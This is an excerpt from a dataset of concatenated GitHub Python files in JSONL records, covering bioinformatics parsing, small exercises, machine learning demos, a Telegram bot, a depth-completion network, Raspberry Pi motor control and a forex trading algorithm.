print(listStore)\r\ntime.sleep(100)\r\n","repo_name":"zengx-git/teachingpython","sub_path":"20201008list.py","file_name":"20201008list.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41387502718","text":"\n\nimport argparse\nimport itertools\nimport operator\n\n\nparser = argparse.ArgumentParser(description='''\n\tParse BLAST outfmt=6 files. \n\tAUTHOR: Michelle Hwang''')\nparser.add_argument('blast', help=\"BLAST OUTFMT=6\")\nparser.add_argument('--n', type=int, default=1, help='Top n results to keep')\nparser.add_argument('--e', default=1E-3, type=float, help='''Optional e-value cut-off for\n\tBLAST results. Default is 1E-3.''')\nparser.add_argument('--p', type=float, default=0, help='''Optional percent identity\n\tcut-off for BLAST results. 
Default is no filter.''')\nparser.add_argument('--g', action='store_true', help='Only consider Trinity genes')\nparser.add_argument('--clean', action='store_true', help='Only print query and hit IDs')\nparser.add_argument('--swissprot', action='store_true', help='Shorten hit ID to just swissprot ID')\nargs = parser.parse_args()\n\n\ndef main():\n\n\twith open(args.blast) as f:\n\t\tlines = f.read().splitlines()\n\n\tsequences = []\n\tsequence_current = None\n\n\tfor line in lines:\n\n\t\tfield = line.split()\n\n\t\tif args.g is True:\n\t\t\tfield[0] = field[0].split('_i')[0]\n\t\tsequence = field[0]\n\n\t\tif float(field[10]) > args.e or float(field[2]) < args.p:\n\t\t\tcontinue\n\n\t\tif args.swissprot is True:\n\t\t\tfield[1] = field[1].split('|')[2]\n\n\t\tif sequence_current == sequence:\n\t\t\tsequences.append(field)\n\t\telse:\n\t\t\tif sequence_current is not None:\n\t\t\t\tsequences_sorted = sorted(sequences, key=lambda rec: float(rec[10])) # ascending e-value puts the best hits first\n\t\t\t\tsequences_sorted = list(x for x,_ in itertools.groupby(sequences_sorted))\n\t\t\t\tfor seq in sequences_sorted[:args.n]:\n\t\t\t\t\tif args.clean is True:\n\t\t\t\t\t\tprint('\\t'.join([str(s) for s in seq[:2]]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint('\\t'.join([str(s) for s in seq]))\n\n\t\t\tsequence_current = sequence\n\t\t\tsequences = []\n\t\t\tsequences.append(field)\n\n\t# flush the hits for the final query; the loop above never prints them\n\tif sequences:\n\t\tsequences_sorted = sorted(sequences, key=lambda rec: float(rec[10]))\n\t\tsequences_sorted = list(x for x,_ in itertools.groupby(sequences_sorted))\n\t\tfor seq in sequences_sorted[:args.n]:\n\t\t\tif args.clean is True:\n\t\t\t\tprint('\\t'.join([str(s) for s in seq[:2]]))\n\t\t\telse:\n\t\t\t\tprint('\\t'.join([str(s) for s in seq]))\n\n\nmain()\n\n\n\n\n\n\n","repo_name":"michelle-hwang/snap","sub_path":"parse_blast_top_hit.py","file_name":"parse_blast_top_hit.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17961166968","text":"#Write a Python program to remove an empty tuple(s) from a list of tuples.\n\nList=[(),(),(0,8),(),(),(),('True','False'),(400,4),(2,3),(5,4),(8,1)]\n\nList=[t for t in List if t ]\nprint(List)\n\n\n\n\n","repo_name":"patel92dharti/Module-3-Collections-functions-and-Modules","sub_path":"26th_Topic.py","file_name":"26th_Topic.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5287323341","text":"#importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing dataset\ndataset = pd.read_csv(r'D:\\upes\\2nd year\\Data mining and prediction by machines\\lab\\Salary_Data.csv')\n\n\nX=dataset.iloc[:,:-1].values\nY=dataset.iloc[:,1].values\n\nprint(X)\nprint(Y)\n\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(X,Y,test_size=.2, random_state=0)\n\nprint(x_train,'\\n')\nprint(x_test,'\\n')\nprint(y_train,'\\n')\nprint(y_test,'\\n')\n\n\nfrom sklearn.linear_model import LinearRegression\nregression = LinearRegression()\nregression.fit(x_train,y_train)\ny_pred=regression.predict(x_test)\nprint('\\n',y_pred)\n\nplt.scatter(x_train,y_train, color='green')\nplt.plot(x_train,regression.predict(x_train), color='red')\nplt.title('Salary Vs Experience(Training set)')\nplt.xlabel('Year of Experience')\nplt.ylabel('salary')\nplt.show()\n","repo_name":"AradhyaMahant/MachineLearning","sub_path":"Linear regression.py","file_name":"Linear regression.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6136308862","text":"#Reads two files then 
compares them\r\na_file = open(\"1a.txt\")\r\nb_file = open(\"2a.txt\")\r\n\r\nlinesA = a_file.readlines()\r\nlinesB = b_file.readlines()\r\n\r\nprint(linesA)\r\nprint(linesB ,\"\\n\")\r\n\r\nif linesA == linesB:\r\n    print(\"equal\")\r\n\r\nelse:\r\n    print(\"not equal\")","repo_name":"VihaanChhabria/Python-Examples","sub_path":"compare text.py","file_name":"compare text.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13538260719","text":"import numpy as np \r\nimport scipy as sp\r\nimport pylab as pl\r\nfrom scipy.optimize import leastsq # import the least-squares routine\r\n \r\nn = 9 # number of polynomial coefficients (fits a degree n-1 polynomial)\r\n\r\n# target function\r\n\r\na = int(input(\"请选择函数类型:1.二次函数;2.一次函数\"))\r\nif a == 1:\r\n    A = int(input(\"请输入A\"))\r\n    B = int(input(\"请输入B\"))\r\n    C = int(input(\"请输入C\"))\r\n    def real_func(x):\r\n        return A*x*x + B*x + C\r\nelse:\r\n    K = int(input(\"请输入K\"))\r\n    B = int(input(\"请输入B\"))\r\n    def real_func(x):\r\n        return K*x + B\r\n    \r\n# polynomial model\r\ndef fit_func(p, x):\r\n    f = np.poly1d(p)\r\n    return f(x)\r\n \r\n \r\n# residual function\r\nregularization = 0.1 # regularization coefficient lambda\r\n \r\ndef residuals_func(p, y, x):\r\n    ret = fit_func(p, x) - y\r\n    ret = np.append(ret, np.sqrt(regularization) * p) # append lambda^(1/2) * p to the end of the returned array\r\n    return ret\r\n \r\n \r\nx = np.linspace(0, 1, 9) # choose 9 sample points for x\r\nx_points = np.linspace(0, 1, 1000) # dense points needed for plotting\r\n \r\ny0 = real_func(x) # ground-truth values\r\ny1 = [np.random.normal(0, 0.1) + y for y in y0] # values with added Gaussian noise\r\n\r\np_init = np.random.randn(n) # randomly initialize the polynomial coefficients\r\n \r\nplsq = leastsq(residuals_func, p_init, args=(y1, x))\r\n \r\nprint('拟合参数: ', plsq[0]) # print the fitted coefficients\r\n\r\n# plot the results\r\npl.plot(x_points, real_func(x_points), label='real')\r\npl.plot(x_points, fit_func(plsq[0], x_points), label='fitted curve')\r\npl.plot(x, y1, 'bo', label='with noise')\r\npl.legend()\r\npl.show()","repo_name":"HnuAiSimOpt/Education","sub_path":"p1_202004061304.py","file_name":"p1_202004061304.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72097035754","text":"class Meter(object):\n    def __init__(self, samplerate=44100):\n        ### state\n        self.w1 = 450.0 / samplerate # attack filter coeff\n        self.w2 = 1300.0 / samplerate # attack filter coeff\n        self.w3 = 1.0 - 5.4 / samplerate # release filter coeff\n        self.g = 0.5108 # gain factor\n        self.z1 = 0 # filter state\n        self.z2 = 0 # filter state\n        self.m = 0 # max value since last read\n\n    ### lambda helpers (internal use)\n    clamp = lambda self, n, minn, maxn: max(min(maxn, n), minn)\n    applyfilt = lambda self, t, z, w: (t - z) * w if t > z else 0\n\n    ### The main process block:\n    ### input : an array of sampled signal values\n    def process(self, block):\n        z1 = self.clamp(self.z1, 0, 20)\n        z2 = self.clamp(self.z2, 0, 20)\n        m = 0\n\n        for i in range(0, len(block), 4):\n            z1 *= self.w3\n            z2 *= self.w3\n            for j in range(i, i + 4):\n                t = abs(block[j])\n                z1 += self.applyfilt(t, z1, self.w1)\n                z2 += self.applyfilt(t, z2, self.w2)\n            t = z1 + z2\n            if t > m: m = t\n\n        self.z1 = z1 + 1e-10\n        self.z2 = z2 + 1e-10\n        self.m = m\n        return self.g * self.m","repo_name":"ilzxc/audiothings","sub_path":"simple_meter/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70632786154","text":"from django.utils.translation import gettext_lazy as _\nfrom django.http import HttpResponseRedirect\nfrom 
django.forms import inlineformset_factory, HiddenInput\nfrom django.contrib.contenttypes.forms import generic_inlineformset_factory\nfrom .base import CreateView, UpdateView\nfrom ..models.brew import Brew\nfrom ..models.batch import Batch\nfrom ..models.step import Step\nfrom ..forms.dtinput import DateTimeInput\n\n\nclass FormSetMixin:\n\n    def get_form(self, form_class=None):\n\n        form = super().get_form(form_class=form_class)\n\n        form.fields['batch'].widget = HiddenInput()\n\n        form.fields.pop('asset')\n        form.fields.pop('step')\n        form.fields.pop('tank')\n\n        form.fields['date'].widget = DateTimeInput()\n\n        return form\n\n    @property\n    def formsets(self):\n\n        factory1 = inlineformset_factory(\n            Brew, Brew.asset.through, exclude=[],\n        )\n\n        factory2 = inlineformset_factory(\n            Brew, Brew.step.through, exclude=[],\n            widgets={'start_time': DateTimeInput(),\n                     'end_time': DateTimeInput()\n                     },\n            can_order=True\n        )\n\n        factory3 = inlineformset_factory(\n            Brew, Brew.tank.through, exclude=[],\n            widgets={'date': DateTimeInput()},\n            extra=1,\n        )\n\n        kwargs = {}\n\n        if self.request.method == \"POST\":\n            kwargs['data'] = self.request.POST\n\n        if self.object:\n            kwargs['instance'] = self.object\n\n        formset_3 = factory3(**kwargs)\n        setattr(formset_3, \"expanded\", True)\n        \n        return [factory1(**kwargs), factory2(**kwargs), formset_3]\n\n    def form_valid(self, form):\n\n        self.object = form.save()\n\n        for _formset in self.formsets:\n            if _formset.is_valid():\n                _formset.save()\n\n        return HttpResponseRedirect(self.get_success_url())\n\n\nclass BrewCreateView(FormSetMixin, CreateView):\n\n    model = Brew\n\n    def get_initial(self):\n\n        if self.kwargs.get('batch'):\n            return {'batch': Batch.objects.get(pk=self.kwargs['batch'])}\n        else:\n            return {}\n\n\nclass BrewUpdateView(FormSetMixin, UpdateView):\n\n    model = Brew\n","repo_name":"ddokter/ninkasi","sub_path":"ninkasi/views/brew.py","file_name":"brew.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28261706712","text":"import asyncio\nimport logging\nimport os\nfrom dotenv import load_dotenv\nfrom aiogram.types import FSInputFile\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.enums import ParseMode\nfrom aiogram.filters import Command\nfrom database import User, create_engine_and_session\nfrom timer import run_timer, stop_timer\n\n\nload_dotenv()\nTOKEN = os.getenv(\"BOT_TOKEN\")\ndp = Dispatcher()\nengine, async_session = create_engine_and_session()\n\n\n@dp.message(Command('start'))\nasync def send_welcome(message: types.Message):\n    await User.create_table(engine)\n    result = await User.add_user(async_session, message.from_user)\n    if result:\n        photo = FSInputFile(\"./profile_photo.jpg\")\n        await message.answer_photo(photo, caption='This is pest programmer - my owner!')\n    await run_timer(message)\n\n\n@dp.message(Command('users_today'))\nasync def send_stat(message: types.Message):\n    user_count = await User.count_users(async_session)\n    await message.answer(f'Total users in DB: {user_count}')\n\n\n@dp.message()\nasync def handle_message(message: types.Message):\n    if message.text == 'Хорошего дня': # the secret phrase (\"Have a good day\" in Russian) stops the timer\n        await stop_timer(message.from_user.id)\n        print('He knows the secret, cancelling the operation!')\n    else:\n        await run_timer(message)\n\n\nasync def main() -> None:\n    bot = Bot(TOKEN, parse_mode=ParseMode.HTML)\n    await dp.start_polling(bot)\n\n\nif __name__ == \"__main__\":\n    logging.basicConfig(level=logging.ERROR, filename='bot.log')\n    
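# start long polling; this call blocks until the bot process is stopped\n    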
asyncio.run(main())\n","repo_name":"CrazyMoT/test_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1934063484","text":"\"\"\"\nAuthor: Wouter Van Gansbeke\nLicensed under the CC BY-NC 4.0 license (https://creativecommons.org/licenses/by-nc/4.0/)\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.data\nimport torch.nn.functional as F\nimport numpy as np\nfrom .ERFNet import Net\nimport copy\nimport Utils.utils as utils\n\nclass uncertainty_net(nn.Module):\n def __init__(self, in_channels, out_channels=1):\n super(uncertainty_net, self).__init__()\n out_chan = 2\n\n self.combine = 'concat'\n self.in_channels = in_channels\n\n out_channels = 3\n\n self.depthnet = Net(in_channels=in_channels, out_channels=out_channels)\n\n local_channels_in = 2 if self.combine == 'concat' else 1\n local_channels_in = 4 if self.combine == 'concat_min' else local_channels_in\n self.convbnrelu = nn.Sequential(convbn(local_channels_in, 32, 3, 1, 1, 1),\n nn.ReLU(inplace=True))\n self.hourglass1 = hourglass_1(32)\n self.hourglass2 = hourglass_2(32)\n self.fuse = nn.Sequential(convbn(32, 32, 3, 1, 1, 1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, out_chan, kernel_size=3, padding=1, stride=1, bias=True))\n self.activation = nn.ReLU(inplace=True)\n self.softmax = torch.nn.Softmax(dim=1) \n\n def forward(self, input, epoch=50):\n if self.in_channels > 1:\n rgb_in = input[:, 1:, :, :]\n lidar_in = input[:, 0:1, :, :]\n input = torch.cat([input[:,:1], rgb_in],1)\n else:\n lidar_in = input\n \n # 1. GLOBAL NET\n embeddings, features = self.depthnet(input)\n embedding0, embedding1, embedding2 = embeddings\n global_features = embedding0[:, 0:1, :, :]\n precise_depth = embedding0[:, 1:2, :, :]\n conf = embedding0[:, 2:, :, :]\n input_max = F.max_pool2d(input[:, 0:1], 16)\n input_max = input[:,0:1] * (input[:,0:1] >= F.interpolate(input_max, size=input.shape[2:]) - 0.1*F.interpolate(input_max, size=input.shape[2:])).float()\n mask = input[:,0:1] == 0\n input_min = -F.max_pool2d(-input[:,0:1] -100*mask.float(), 16)\n input_min = input[:,0:1] * (input[:,0:1] <= F.interpolate(input_min, size=input.shape[2:]) + 0.1*F.interpolate(input_min, size=input.shape[2:])).float()\n\n # 2. Fuse \n if self.combine == 'concat':\n input = torch.cat((lidar_in, global_features), 1)\n elif self.combine == 'concat_min':\n input = torch.cat((lidar_in, global_features, input_min, input_max), 1)\n elif self.combine == 'add':\n input = lidar_in + global_features\n elif self.combine == 'mul':\n input = lidar_in * global_features\n elif self.combine == 'sigmoid':\n input = lidar_in * nn.Sigmoid()(global_features)\n else:\n input = lidar_in\n # 3. LOCAL NET\n out = self.convbnrelu(input)\n out1, embedding3, embedding4 = self.hourglass1(out, embedding1, embedding2)\n out1 = out1 + out\n out2 = self.hourglass2(out1, embedding3, embedding4)\n out2 = out2 + out\n out = self.fuse(out2)\n lidar_out = out\n\n # 4. 
Late Fusion\n lidar_to_depth, lidar_to_conf = torch.chunk(out, 2, dim=1)\n lidar_to_conf, conf = torch.chunk(self.softmax(torch.cat((lidar_to_conf, conf), 1)), 2, dim=1)\n out = conf * precise_depth + lidar_to_conf * lidar_to_depth\n return out, lidar_out, precise_depth, global_features\n\n\ndef convbn(in_planes, out_planes, kernel_size, stride, pad, dilation):\n\n return nn.Sequential(nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=dilation if dilation > 1 else pad, dilation=dilation, bias=False))\n\n\nclass hourglass_1(nn.Module):\n def __init__(self, channels_in):\n super(hourglass_1, self).__init__()\n\n self.conv1 = nn.Sequential(convbn(channels_in, channels_in, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.ReLU(inplace=True))\n\n self.conv2 = convbn(channels_in, channels_in, kernel_size=3, stride=1, pad=1, dilation=1)\n\n self.conv3 = nn.Sequential(convbn(channels_in*2, channels_in*2, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.ReLU(inplace=True))\n\n self.conv4 = nn.Sequential(convbn(channels_in*2, channels_in*2, kernel_size=3, stride=1, pad=1, dilation=1))\n\n self.conv5 = nn.Sequential(nn.ConvTranspose2d(channels_in*4, channels_in*2, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv6 = nn.Sequential(nn.ConvTranspose2d(channels_in*2, channels_in, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in))\n ### Target Batch Norms\n self.conv5_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv6_bn_t = nn.BatchNorm2d(channels_in)\n\n self.conv5_bn_s = self.conv5[1]\n self.conv6_bn_s = self.conv6[1]\n\n\n \n def forward(self, x, em1, em2):\n x = self.conv1(x)\n x = self.conv2(x)\n x = F.relu(x, inplace=True)\n x = torch.cat((x, em1), 1)\n\n x_prime = self.conv3(x)\n x_prime = self.conv4(x_prime)\n x_prime = F.relu(x_prime, inplace=True)\n x_prime = torch.cat((x_prime, em2), 1)\n\n out = self.conv5(x_prime)\n out = self.conv6(out)\n\n return out, x, x_prime\n\n\nclass hourglass_2(nn.Module):\n def __init__(self, channels_in):\n super(hourglass_2, self).__init__()\n\n self.conv1 = nn.Sequential(convbn(channels_in, channels_in*2, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv2 = convbn(channels_in*2, channels_in*2, kernel_size=3, stride=1, pad=1, dilation=1)\n\n self.conv3 = nn.Sequential(convbn(channels_in*2, channels_in*2, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv4 = nn.Sequential(convbn(channels_in*2, channels_in*4, kernel_size=3, stride=1, pad=1, dilation=1))\n\n self.conv5 = nn.Sequential(nn.ConvTranspose2d(channels_in*4, channels_in*2, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv6 = nn.Sequential(nn.ConvTranspose2d(channels_in*2, channels_in, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in))\n\n\n\n\n ### Target Batch Norms\n self.conv1_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv3_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv5_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv6_bn_t = nn.BatchNorm2d(channels_in)\n\n self.conv1_bn_s = self.conv1[1]\n self.conv3_bn_s = self.conv3[1]\n self.conv5_bn_s = self.conv5[1]\n self.conv6_bn_s = self.conv6[1]\n\n\n def forward(self, x, em1, em2):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x + 
em1\n        x = F.relu(x, inplace=True)\n\n        x_prime = self.conv3(x)\n        x_prime = self.conv4(x_prime)\n        x_prime = x_prime + em2\n        x_prime = F.relu(x_prime, inplace=True)\n\n        out = self.conv5(x_prime)\n        out = self.conv6(out)\n\n        return out\n\n","repo_name":"alopezgit/project-adapt","sub_path":"Models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7729,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"}
+{"seq_id":"72362143594","text":"import unittest\r\nimport Lab7\r\n\r\nclass TestLab(unittest.TestCase):\r\n    \r\n    def test_edit_distance(self):\r\n        string = [\"Pittsburgh\",\"Pennsylvania\",\r\n                  \"Tucson\",\"Arizona\",\r\n                  \"Cincinnati\",\"Ohio\",\r\n                  \"Albuquerque\",\"New Mexico\",\r\n                  \"Culpeper\",\"Virginia\",\r\n                  \"Asheville\",\"North Carolina\",\r\n                  \"Worcester\",\"Massachusetts\",\r\n                  \"Manhattan\",\"New York\",\r\n                  \"Phoenix\",\"Arizona\",\r\n                  \"Niagara Falls\",\"New York\"]\r\n##        string1 = \"Sunday\"\r\n##        string2 = \"Saturday\"\r\n        for i in range(len(string)):\r\n            if i+1==len(string):\r\n                return\r\n            string1=string[i]\r\n            string2=string[i+1]\r\n            print(string1,string2)\r\n            Lab7.edit_distance(string1, string2, len(string1), len(string2))\r\n        \r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n","repo_name":"aponce12/Lab7","sub_path":"test_lab7.py","file_name":"test_lab7.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"38932611223","text":"from common.common_rakuten import *\r\n\r\n@click.command('task_tracking', help=\"Hello World.\") \r\n@with_appcontext\r\ndef task_tracking_run():\r\n    # processing date\r\n    process_date = datetime.datetime.now().strftime('%Y%m%d')\r\n    # output file name\r\n    file_name='research_tracking'+process_date+'.tsv'\r\n    # webdriver\r\n    driver=get_driver()\r\n    input_list=[]\r\n    f = open(\"C:\\\\serp\\\\files\\\\input\\\\1col.tsv\", 'r', encoding='UTF-8')\r\n    for data in f:\r\n        input_list.append(data.rstrip('\\n'))\r\n    f.close()\r\n\r\n    for asin in input_list:\r\n        try:\r\n\r\n            driver.get('https://keepa.com/#!product/5-'+asin)\r\n            time.sleep(10)\r\n            now_price=driver.find_element(By.XPATH, '//*[@id=\"productInfoBox\"]/span[2]/span').get_attribute('innerHTML').replace('¥ ', '').replace(',', '')\r\n            purpose_price=round(int(now_price)*0.75)\r\n            driver.find_element(By.ID, \"tabTrack\").click()\r\n            ama_price_element=driver.find_element(By.ID, \"csvtype-5-0-threshold\")\r\n            new_price_element=driver.find_element(By.ID, \"csvtype-5-1-threshold\")\r\n            ama_price_element.clear()\r\n            new_price_element.clear()\r\n            ama_price_element.send_keys(purpose_price)\r\n            new_price_element.send_keys(purpose_price)\r\n            focusToElement(driver, By.ID, \"submitTracking\", True)\r\n            driver.find_element(By.ID, \"submitTracking\").click()\r\n        except Exception as e:\r\n            logger.debug('tracking error '+ asin)\r\n            print(asin)\r\n            print(e)\r\n            continue\r\n\r\n","repo_name":"itsu1113/serp","sub_path":"jobs/task_tracking.py","file_name":"task_tracking.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12105647599","text":"import RPi.GPIO as GPIO\r\nfrom motors import motors\r\nfrom motors import motor_speeds\r\nfrom motors import motor_pins\r\nfrom time import sleep\r\nfrom speedSensor import speedSensor\r\n# Motor definitions were moved out of this module.\r\nclass carsWith2Motor:\r\n    def __init__(self, motorRight: motors, motorLeft: motors):\r\n        self.motorRight:motors = motorRight\r\n        self.motorLeft:motors = motorLeft\r\n        self.direction = 1 # Forward\r\n        
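# Steering is differential: a turn bumps one side's motor up (or the other side\n        # down) by one gear via turnRight()/turnLeft() below; there is no steering servo.\n        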
self.angle = 0 # -1: one gear more on the left side, +1: one gear more on the right side\n        self.gear = 1\n        self.motorRight.motorSet()\n        self.motorLeft.motorSet()\n        self.stopped = True\n        \n    def turnRight(self):\n        if self.motorLeft.isMaxGear():\n            if self.motorRight.isMinGear():\n                return\n            else:\n                self.motorRight.gearDown(1)\n        else:\n            self.motorLeft.gearUp(1) \n        \n    def turnLeft(self):\n        if self.motorRight.isMaxGear():\n            if self.motorLeft.isMinGear():\n                return\n            else:\n                self.motorLeft.gearDown(1)\n        else:\n            self.motorRight.gearUp(1) \n\n    def stop(self):\n        self.motorRight.stop()\n        self.motorLeft.stop()\n    \n    def changeGear(self,gear):\n        self.motorRight.changeGear(gear)\n        self.motorLeft.changeGear(gear)\n        self.gear = gear\n\n    def gearUp(self,up):\n        self.motorRight.gearUp(up)\n        self.motorLeft.gearUp(up)\n\n    def gearDown(self,down):\n        self.motorRight.gearDown(down)\n        self.motorLeft.gearDown(down)\n    \n    def forward(self):\n        self.changeGear(self.gear)\n        self.motorRight.forward()\n        self.motorLeft.forward()\n\n    def backward(self):\n        self.changeGear(self.gear)\n        self.motorRight.backward()\n        self.motorLeft.backward()\n\n    def setSpeed(self,speed):\n        self.motorRight.setSpeed(speed) \n        self.motorLeft.setSpeed(speed)\n\ndef getStandartCar():\n    pinsLeft = motor_pins(17,18,23)\n    pinsRight = motor_pins(22,27,24)\n\n    theSpeeds = motor_speeds(50,4,1)\n    motorRight = motors.fromPinDefs(pinsRight, theSpeeds)\n    motorLeft = motors.fromPinDefs(pinsLeft, theSpeeds)\n    \n    speedSensorRight = speedSensor(25,1,20,5)\n    motorRight.setSpeedSensor(speedSensorRight)\n    motorRight.spS.turnOnDetector()\n    \n    #speedSensorLeft = speedSensor(25,1,20,5)\n    #motorLeft.setSpeedSensor(speedSensorLeft)\n\n    myCar = carsWith2Motor(motorRight, motorLeft)\n    \n    return myCar\n\ndef carTest():\n    #pinsLeft = motor_pins(23,24,25)\n    pinsLeft = motor_pins(17,18,23)\n    pinsRight = motor_pins(22,27,24)\n    # MOTOR1IN2 = 24\n    # MOTOR1IN1 = 23\n    # MOTOR1EN = 25\n    # MOTOR2IN2 = 27\n    # MOTOR2IN1 = 22\n    # MOTOR2EN = 26\n\n    GPIO.setmode(GPIO.BCM)\n\n    theSpeeds = motor_speeds(70,4,1)\n    motorRight = motors.fromPinDefs(pinsRight, theSpeeds)\n    motorLeft = motors.fromPinDefs(pinsLeft, theSpeeds)\n\n    myCar = carsWith2Motor(motorRight, motorLeft)\n    myCar.forward()\n    myCar.changeGear(2)\n    sleep(2)\n    myCar.turnRight()\n    sleep(2)\n    myCar.backward()\n    sleep(1)\n    myCar.stop()\n\n    #GPIO.cleanup()\n    \n    #carTest()\n","repo_name":"mehmetkuzu/RPi_motors_cars","sub_path":"motors_cars.py","file_name":"motors_cars.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"21110449412","text":"from datetime import datetime, timedelta\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom math import floor\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import tree\nimport talib \nfrom talib import MA_Type\n\nclass BasicTemplateAlgorithm(QCAlgorithm):\n\n    def Initialize(self):\n        \n        '''\n        NOTE: \n        BLOCK COMMENTS - USER-DEFINED PARAMETERS\n                       - DEBUG BLOCKS\n        LINE COMMENTS - CODE-SNIPPET DOCUMENTATION\n        '''\n        \n        ''' Set Start Date [User-Defined] '''\n        self.SetStartDate(2018, 11, 7) \n        ''' Set End Date [User-Defined] '''\n        self.SetEndDate(2018, 11, 21) \n        ''' Set Strategy Cash [User-Defined] '''\n        self.SetCash(100000) \n        \n        '''\n        Currencies Selected to Provide Extra Information for Prediction Model [User-Defined]\n        '''\n        self.symbols = [\"NZDUSD\", \"AUDUSD\", \"GBPUSD\", \"EURUSD\",] \n        \n        \n        '''\n        Extra 
Currency Pairs to be Chosen by User for Extra Features [User-Defined]\n NOTE: The Best-Found Combination is the 4 Above.\n NOTE: Add Currency Pair from List Below into 'Self.Extra_Sym'\n NOTE: Overcrowding Currency Pairs May Cause Overfitting\n\n List of Currency Pairs to Choose From:\n \"USDSEK\"\n \"USDJPY\"\n \"USDCAD\"\n \"USDNOK\"\n \"USDSEK\"\n \"USDCHF\"\n \"USDZAR\"\n '''\n self.extra_sym = []\n self.symbols = self.symbols + self.extra_sym # Extend Symbols List\n self.sym_n = len(self.extra_sym) # For Dynamically Locating Signals\n \n ''' Target Trading Symbol [User-Defined] '''\n self.trading_symbol = \"EURUSD\"\n \n for i in self.symbols:\n ''' [User-Defined Resolution] '''\n self.AddForex(i, Resolution.Daily) \n \n self.long_list = [] # List of Long Positions \n self.short_list = [] # List of Short Positions\n \n ''' Historical Data Period [User-Defined] '''\n self.data_period = 300 \n ''' Rolling Window Period [User-Defined] '''\n self.window_period = 55\n\n def OnData(self, data):\n \n data_dict = {} # Dictionary of Currency & List of Data as Key Pair Values\n price = 0 # Selected Trading Currency's Current Price\n \n # For All Currency Selected for Prediction Model\n for i in self.symbols: \n \n ''' Download Historical Data [User-Defined Resolution] '''\n currency_slices = self.History([i], self.data_period, Resolution.Daily)\n \n # Get Entire Currency Slice\n currency_bars = currency_slices.loc[i]\n \n ''' \n Get Attribute (Feature Selection) [User-Defined]\n NOTE: This is a 'Choose-One'\n NOTE: Multi-Attribute Features can be a Future Improvement\n \n Possible Features to Choose From:\n high, low, close\n askopen, askhigh, asklow, askclose\n bidopen, bidhigh, bidlow, bidclose\n '''\n currency_close = currency_bars['close']\n \n # Store in Dictionary\n data_dict[i] = currency_close\n \n # Grab Target Trading Currency's Current Price [User-Defined Currency]\n if i == self.trading_symbol:\n price = currency_close[-1]\n \n '''\n Debug 1: Checking Information is Stored Correctly in Dictionary \n '''\n #self.Debug(\"Columns Check: \" + str(list(data_dict.keys())))\n #self.Debug(\"Value Check: \" + str(data_dict)) \n \n # Convert Dictionary to DataFrame\n prices_in_df = pd.DataFrame(data_dict, columns = data_dict.keys())\n # Reverse all USD-base currency pairs\n prices_in_df = self.reverseCurr(prices_in_df, self.extra_sym)\n\n '''\n Debug 2: Checking if Dictionary is Properly Converted to DataFrame\n '''\n #self.Debug(\"Prices in Dataframe Check: \")\n #self.Debug(prices_in_df.head())\n \n # Calls to Run Ensemble - Decision Tree, Random Forest, Logistic Regression [User-Defined Threshold]\n # Returns a DataFrame 